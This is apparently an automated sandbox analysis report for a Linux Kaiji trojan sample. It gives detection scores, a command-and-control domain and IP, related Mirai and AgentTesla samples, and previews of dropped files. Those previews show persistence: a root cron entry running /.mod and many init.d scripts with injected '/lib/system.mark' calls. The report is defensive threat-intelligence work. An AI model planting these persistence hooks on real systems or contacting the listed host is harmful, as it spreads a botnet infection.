started        61 service sed 43->61         started        63 .mod libgdi.so.0.8.2 45->63         started        65 .mod libgdi.so.0.8.2 47->65         started        process13 67 libgdi.so.0.8.2 libgdi.so.0.8.2 63->67         started        69 libgdi.so.0.8.2 libgdi.so.0.8.2 65->69         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ausNOyj9by.elf32%ReversingLabsLinux.Trojan.Kaiji
ausNOyj9by.elf100%Joe Sandbox ML
SourceDetectionScannerLabelLink
/.mod0%ReversingLabs
/etc/init.d/acpid0%ReversingLabs
/etc/init.d/alsa-utils0%ReversingLabs
/etc/init.d/anacron0%ReversingLabs
/etc/init.d/apparmor0%ReversingLabs
/etc/init.d/avahi-daemon0%ReversingLabs
/etc/init.d/bluetooth0%ReversingLabs
/etc/init.d/console-setup.sh0%ReversingLabs
/etc/init.d/cups0%ReversingLabs
/etc/init.d/cups-browsed0%ReversingLabs
/etc/init.d/dbus0%ReversingLabs
/etc/init.d/dns-udp40%ReversingLabs
/etc/init.d/irqbalance0%ReversingLabs
/etc/init.d/keyboard-setup.sh0%ReversingLabs
/etc/init.d/kmod0%ReversingLabs
/etc/init.d/rsync0%ReversingLabs
/etc/init.d/saned0%ReversingLabs
/etc/init.d/screen-cleanup0%ReversingLabs
/etc/init.d/spice-vdagent0%ReversingLabs
/etc/init.d/ufw0%ReversingLabs
/etc/init.d/unattended-upgrades0%ReversingLabs
/etc/init.d/uuidd0%ReversingLabs
/etc/profile.d/bash.cfg.sh0%ReversingLabs
No Antivirus matches
SourceDetectionScannerLabelLink
http://html4/loose.dtd0%Avira URL Cloudsafe
http://.jpg0%Avira URL Cloudsafe
http://.css0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
botbot.ddosvps.cc
209.141.53.247
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://html4/loose.dtdausNOyj9by.elffalse
    • Avira URL Cloud: safe
    unknown
    http://.cssausNOyj9by.elffalse
    • Avira URL Cloud: safe
    unknown
    http://.jpgausNOyj9by.elffalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    209.141.53.247
    botbot.ddosvps.ccUnited States
    53667PONYNETUSfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    209.141.53.247IMG_62100_41600pdf.exeGet hashmaliciousAgentTeslaBrowse
    • 209.141.53.247/nel-1/inc/56ee82c6804416.php
    IMG2115600269pdf.exeGet hashmaliciousAgentTeslaBrowse
    • 209.141.53.247/nel-1/inc/56ee82c6804416.php
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    botbot.ddosvps.ccW4bP4K6GeP.elfGet hashmaliciousUnknownBrowse
    • 209.141.53.247
    HvuWdJQMCR.elfGet hashmaliciousUnknownBrowse
    • 209.141.53.247
    Vij3FJ8y4o.elfGet hashmaliciousUnknownBrowse
    • 209.141.53.247
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    PONYNETUSW4bP4K6GeP.elfGet hashmaliciousUnknownBrowse
    • 209.141.53.247
    HvuWdJQMCR.elfGet hashmaliciousUnknownBrowse
    • 209.141.53.247
    Vij3FJ8y4o.elfGet hashmaliciousUnknownBrowse
    • 209.141.53.247
    209.141.57.51-x86-2024-07-01T10_22_46.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 209.141.57.51
    209.141.57.51-mips-2024-07-01T10_22_47.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 209.141.57.51
    BVwjyOTKbI.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
    • 107.189.29.207
    dqQPx7jLP8.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
    • 107.189.29.207
    dREJ0R0Ryy.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
    • 107.189.29.207
    hr4p2xQJR2.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
    • 107.189.29.207
    Dv2eb8QXJD.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
    • 107.189.29.207
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    /etc/init.d/alsa-utilsW4bP4K6GeP.elfGet hashmaliciousUnknownBrowse
      HvuWdJQMCR.elfGet hashmaliciousUnknownBrowse
        Vij3FJ8y4o.elfGet hashmaliciousUnknownBrowse
          /etc/init.d/acpidW4bP4K6GeP.elfGet hashmaliciousUnknownBrowse
            HvuWdJQMCR.elfGet hashmaliciousUnknownBrowse
              Vij3FJ8y4o.elfGet hashmaliciousUnknownBrowse
                /.modW4bP4K6GeP.elfGet hashmaliciousUnknownBrowse
                  HvuWdJQMCR.elfGet hashmaliciousUnknownBrowse
                    Vij3FJ8y4o.elfGet hashmaliciousUnknownBrowse
                      adm64Get hashmaliciousUnknownBrowse
                        Process:/tmp/ausNOyj9by.elf
                        File Type:Bourne-Again shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):36
                        Entropy (8bit):3.9931325576478587
                        Encrypted:false
                        SSDEEP:3:TKH/LQP5r:8M1
                        MD5:77037D22D4F473F068BCE3E3318ACB01
                        SHA1:8AB05FF9A8D9D73E2B23643B39D67EA1FF7A6418
                        SHA-256:2F34A08D31571167FB11C6BA96496246219E44403A091B7F010B4C5559CB542B
                        SHA-512:AE29513E81C527D8D27EF4CFE69E8D357632BA9AD944F7634D638DA486F8ABBDBD3181164C297A2AA3053D2BA46A5FB19471B5E809D2BB52996E4E2D312DF334
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: W4bP4K6GeP.elf, Detection: malicious, Browse
                        • Filename: HvuWdJQMCR.elf, Detection: malicious, Browse
                        • Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
                        • Filename: adm64, Detection: malicious, Browse
                        Reputation:low
                        Preview:#!/bin/bash./usr/lib/libgdi.so.0.8.2
                        Process:/tmp/ausNOyj9by.elf
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):171
                        Entropy (8bit):3.798798508425555
                        Encrypted:false
                        SSDEEP:3:0dkTLQKTBWTsbGqdtbGqYwZWNUdYXRGXGOaYXRGXBHUkDzYd8dkTLQKTBWTsbGqV:0d4MIBVD3DYwiUgRGWARGWkvYd8d4MI9
                        MD5:DD788627B7A838D5779BB2747FF2F488
                        SHA1:1F48BDC30B95DB0B65706B028BDCEC7DBEAAE714
                        SHA-256:2E335B60F725088705E6510B3BF4CE60404BEFF41DA4A27C96F009B92F48D37F
                        SHA-512:8363A8C6EA0607252B9A57562531D215EEB0D7D318CB5ADDD5ADAB89FBC311069E2CA177E01D5EC96472AE09AAAD48E5C690702AA88DF79BA92D6FDEA6B57766
                        Malicious:false
                        Reputation:low
                        Preview:e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.e74ed74ec12818ace24ce20ec12818ace24ce20edf3910b3fc6e8618.e464ed5cf25f2df1d063c362c10739c0e263c362c10739c0e263f618.
                        Process:/bin/bash
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):24
                        Entropy (8bit):3.000961982762677
                        Encrypted:false
                        SSDEEP:3:HFdtKeIBFv:l6eIBV
                        MD5:6B13F24B625DC5B832A4AE80CFAB7DDA
                        SHA1:8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
                        SHA-256:AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
                        SHA-512:76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
                        Malicious:true
                        Reputation:moderate, very likely benign file
                        Preview:*/1 * * * * root /.mod .
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2304
                        Entropy (8bit):5.101745776620701
                        Encrypted:false
                        SSDEEP:48:9tdVEA2+3MPMiOBdxAEGbsbcq1himLHLHmvgjWL:9tdVEA2+3MPi90Qbcq1Q4Hrmvt
                        MD5:6BBECC4CA13C3007B79B315AD5B8EB33
                        SHA1:E32443A6D19709D269DFD58D5D48F23192F8ED82
                        SHA-256:98C12A01C2E5F562B14E931C9B503824429C82E088BA06BA43A6313565DB15DE
                        SHA-512:29E15DE525FB44D5823429C80280CBF91592A546A5778EA6C056DFE7A390C4DEC2381D22649A110D14DD732473BB9BA7C43D482BAE2E7315120AE8BF9AFE502B
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: W4bP4K6GeP.elf, Detection: malicious, Browse
                        • Filename: HvuWdJQMCR.elf, Detection: malicious, Browse
                        • Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
                        Reputation:low
                        Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] || exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] || return 0. if [ "$MODULES" = "all" ]; then./lib/system.mark. MODULES="$(sed -rn 's#^(/lib/mod
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):5694
                        Entropy (8bit):5.4216099972768905
                        Encrypted:false
                        SSDEEP:96:iKtDd9/iwtDaLE+E9nw3mFRzF+rv17AypQyhHk5eEkv:iCdld6E+UnKeRB+rv1cyOyZkq
                        MD5:25EEDDA5AB2F0AF6683A5A1365EF11A0
                        SHA1:76963A11F9F43D6BC6336B0A9610C8668E0F3E79
                        SHA-256:37AAA474A96690F2C8BCAD49AB3E31D59D2E4749E2C3EEF7AFCB82406DF6FD81
                        SHA-512:3D89F435223BC02FC71722A6FC3A256F30A15168A45DD239B28144593E66653DF43C8F2B0CBFF57BB432D68B26F98173B5F19A2EC6D4D319EDB76994902374CC
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Joe Sandbox View:
                        • Filename: W4bP4K6GeP.elf, Detection: malicious, Browse
                        • Filename: HvuWdJQMCR.elf, Detection: malicious, Browse
                        • Filename: Vij3FJ8y4o.elf, Detection: malicious, Browse
                        Reputation:low
                        Preview:#!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] || exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2124
                        Entropy (8bit):4.763929127414264
                        Encrypted:false
                        SSDEEP:24:aiF8WzzU+LuN5K6YqfO05i1CPeueczZR11s+M8k93ILlfdW6910kF4T0Op:7RzgTNNOGi1eTrzZR1vX5fsKX00+
                        MD5:816D2CB2EBBEA0A92840D29E03A3AEF2
                        SHA1:DE872E6EAA118E80E9D7A3D1B0CA7C73FD30CB49
                        SHA-256:2822A1618EEFA229CB29520923C7E47B61981E11D2028CD62611B18BCE215B87
                        SHA-512:5BD322EA5D511EA3A5C7AB832FCCB7DA138C4E352CCD5A140F783B4E196A5C2A0FA33D5DFB54C353A15ADEF42E507D076E66C3C3546EE1E70F538EDA7E52EB7E
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Reputation:low
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron || exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system.mark. exit 1. fi. log_daemon_msg "Starting
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3826
                        Entropy (8bit):5.2527487182090535
                        Encrypted:false
                        SSDEEP:96:RFCjnn83hjzYn1zJNSNuDNBqNPoNpDbANEFygG9M3zR4hszR4hxRl:Wjn4hjUD9dwl
                        MD5:026032FB398BC8D223FFFAC164EC8BDC
                        SHA1:2804934FD92CE102B1B64E908DE69B93BDAF0F62
                        SHA-256:7EBDBADE1AA7BE3A53549975CD202067C822B137898B91AEE8148A96B80B82D5
                        SHA-512:CAD3D3A4EBC3B0B3707B2B8FA5D301F0A8FEFBE78D7064B096A746AB2C0957B2AF29CA4BAFB4603EF0C80380EBC5AD40A7030C7B49BF62164B9DAFECD2C8CFB5
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Reputation:low
                        Preview:#!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3050
                        Entropy (8bit):5.219163763155702
                        Encrypted:false
                        SSDEEP:48:jV/OxxHuoBusZABLm/tiUmZdWEdBuSZWg/e/fupMWDGdxboGxz5:jV/OxNDBusZABLm1BmyEbuSZWg2/TWOT
                        MD5:8669B5F957342072FF16241BEAA010FD
                        SHA1:2E45CEA64AEE1115B5EDBAAC7407B340E47EC7C1
                        SHA-256:4DE7B672D754167242FEB9A95D9FA35514114948CFD3567B8BB8BF294F38FB17
                        SHA-512:4F426321E4A7123B6E0B19DEF3455CEACBA152FCB5F21A106B809F3B2FB2054300F391DEE9E498749544ED22C8B351AD5E35658813209917672052988D21DF8F
                        Malicious:true
                        Preview:#! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] || exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME || true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] || mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] || [ -n "`ls /va
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2453
                        Entropy (8bit):4.853742484748698
                        Encrypted:false
                        SSDEEP:48:9s2V+ig+Ui83MZoJQukTSiVC2/uldA0uv3uKv2ZsGyjyRfg/zsDE7Ed:93oijU4ukTSCu40uv3uKvdJOR4ADHd
                        MD5:D6F4FB4B6543A32644DC249C8B6D17A0
                        SHA1:C5E44B40458D426759A7EB88B4E55C3ACEF94077
                        SHA-256:05EF48FCD09FA3D2BC5C5297F0C9852810F8CBECEA65B0ED26A980D4A5F9D387
                        SHA-512:06573A9DC46732518C4BAC856AA7C47B67CB0612BAC0192312A95699DF090782F457EBD138FCD6AE9858F8359209A54EC020115E1EFE450C2EA68D47E4554D30
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1193
                        Entropy (8bit):5.05188801367894
                        Encrypted:false
                        SSDEEP:24:ai3V6yXngSBVSBNyj6edNHcBcNlekvx2w5mw+76opC:73ZngWVWNMNH0YlbJ2w4wrJ
                        MD5:E6D454B5675D599827B9892551BAF33F
                        SHA1:FC529362E60C9D6B0DC86779CFA890B6621FD11E
                        SHA-256:37F47BEF4B4D1021E5FDC6BD2F4E90FA9BA3175A83DB2BE094EF68F50A07828B
                        SHA-512:3752D5178841DDD8FB9F09BDA4EB0D2FA4391BB951273B3911347AC93135E9A516919E28487724371F6A7CE689BAA053855A3219FC68944751313B0405BA48DE
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system.mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 || exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable || CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable || CODE=$?. log_end_msg $CODE. exi
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3071
                        Entropy (8bit):5.405379841493847
                        Encrypted:false
                        SSDEEP:48:71OoPrcMbC/BUUzGrm92+kbM9A5LmiEQoOZoKkkFoM+Zh9YkFoMr4Ote:79TcWC/BUeem92R4q5LRPt5w9VplA
                        MD5:85F7B5D11EBD6ABDA86B5DF999F8B6D6
                        SHA1:898A95C0302A0D24763D2B10EDC21E921564B1C8
                        SHA-256:5A23A691BEE3E1D9A1723811D45030CCAD72CDFDA4AF1C1B5BEC6C027F8831D3
                        SHA-512:9BED1FAE531015163C3665B24B678AEA239EC8FA6F92E06CCD044AEAF1B490251B5D7196876FAF1E8C3F2C73E208E268BF9DB6EC9B0535FC7CABA5DC6542F692
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):1301
                        Entropy (8bit):4.338919117179571
                        Encrypted:false
                        SSDEEP:24:9lBie8ItKzeBcxlo8/z3ejhGJckS5gzjdJ5ZWkZg7zcOqb6:938yKzYcX/LshGJckS5gJ58kG7A9b6
                        MD5:BDD323E45B8053AC9234F45E20BABD66
                        SHA1:0141637CE3CE6E3401B3863FED8103F825427055
                        SHA-256:44922CED598FFB90525BA2E3285418AE91C2788E4A3DEE0EEE1C3DBF8191AC96
                        SHA-512:9BCD74E42D402FCA871BB0B7900821401FA5F229DE02D977D130A48D35BC088BAE03B8FE5D235EA3E1C0309B4B35DF069AA51F496BF8FD5406CDD4BCBCD7B12F
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:#!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system.mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system.mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system.mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):3111
                        Entropy (8bit):4.912604701068792
                        Encrypted:false
                        SSDEEP:48:5PMic6MicW4dJIrcz8WD23fK2LAb38ClAATDuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsYDT6MnidD/A3gU
                        MD5:C47C5241A33BA37060C9A1A58C167E9E
                        SHA1:9ED529B5EFC37F87EF208A43161D198838600310
                        SHA-256:6EECCBE60DB542164C6E4F3ADB1291DF01D1502F9A12531D2CCD7A95A88F1712
                        SHA-512:B01E7002EF994DF92650E51AA40438F636A8EEE1ABD5E6B6E65F64791CB78C49F412DDD29F82D5840ABDD917CF008713C7D2FBA0E929656ECF713DBB71B255AF
                        Malicious:true
                        Preview:#!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON || exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):955
                        Entropy (8bit):5.163687656510361
                        Encrypted:false
                        SSDEEP:12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrEcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKicr/ZkVyKDpjQ
                        MD5:F59810FCEAD6967D3484941B757C5D9F
                        SHA1:8E78AB09A2E17C4662DE668D65A620CBC4F2A95A
                        SHA-256:3ABA882AD020C66D4F94787BB8CA8CE3F1C40CE725B4A8471009B561C0A951D0
                        SHA-512:E99CD55831661A71CADD479321623D42FA9E22F8417F812C9357D229D5D3A76EDDA65B97D9A71C00C741EE910335CA3966637C5C6F6D154E8373CA154893CC22
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks.# Required-Start: checkroot cryptdisks-early.# Required-Stop: umountroot cryptdisks-early.# Should-Start: udev mdadm-raid lvm2.# Should-Stop: udev mdadm-raid lvm2.# X-Start-Before: checkfs.# X-Stop-After: umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup remaining encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="remaining".DEFAULT_LOUD="yes"..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):914
                        Entropy (8bit):5.162273569946851
                        Encrypted:false
                        SSDEEP:12:aiy2BTCZN2MVW4qVS5sNBq2dX9qLgcIcrEcrmZm2dpBdMyuDHkkGKErIKDq7URuL:ai/TTMkw5Mq2CBKYZkVyKDvjQ
                        MD5:4D657844653E6118D801763C22C19937
                        SHA1:6E7F91D90BAF86647698FA87FACD293CB345CF8B
                        SHA-256:DF98C3C25E61F97881A20C39E5F44F544994FB3C56ACBBA6BE5F4BFEB6FD359E
                        SHA-512:7915008586A4E3F57F8334E94F7A61E4FA3B51981AF2E0806B7AD2D9E0E6BBF8B321A3389D5A834EB73BF99957102A29DDF24841AA6D4E3354517A6668763CAA
                        Malicious:true
                        Preview:#! /bin/sh.### BEGIN INIT INFO.# Provides: cryptdisks-early.# Required-Start: checkroot.# Required-Stop: umountroot.# Should-Start: udev mdadm-raid.# Should-Stop: udev mdadm-raid.# X-Start-Before: lvm2.# X-Stop-After: lvm2 umountfs.# X-Interactive: true.# Default-Start: S.# Default-Stop: 0 6.# Short-Description: Setup early encrypted block devices..# Description:.### END INIT INFO..set -e..if [ -r /lib/cryptsetup/cryptdisks-functions ]; then./lib/system.mark... /lib/cryptsetup/cryptdisks-functions.else..exit 0.fi..INITSTATE="early".DEFAULT_LOUD=""..case "$CRYPTDISKS_ENABLE" in.[Nn]*)..exit 0..;;.esac..case "$1" in.start)..do_start..;;.stop)..do_stop..;;.restart|reload|force-reload)..do_stop..do_start..;;.force-start)..FORCE_START="yes"..do_start..;;.*)..echo "Usage: cryptdisks-early {start|stop|restart|reload|force-reload|force-start}"..exit 1..;;.esac..
                        Process:/tmp/ausNOyj9by.elf
                        File Type:POSIX shell script, ASCII text executable
                        Category:dropped
                        Size (bytes):2856
                        Entropy (8bit):5.228297603931064
                        Encrypted:false
                        SSDEEP:48:76MLNMwmbAzAZVCoLqLVj1I6NH/qAh1UoAaYmUoG/FVv/FkG/UoG/FQRetsJ:7BWwmEMZVChVB7UoAaZUoGDvuG/UoGq/
                        MD5:2A2270B6CC5B1BB95B8ED17ACC2C088E
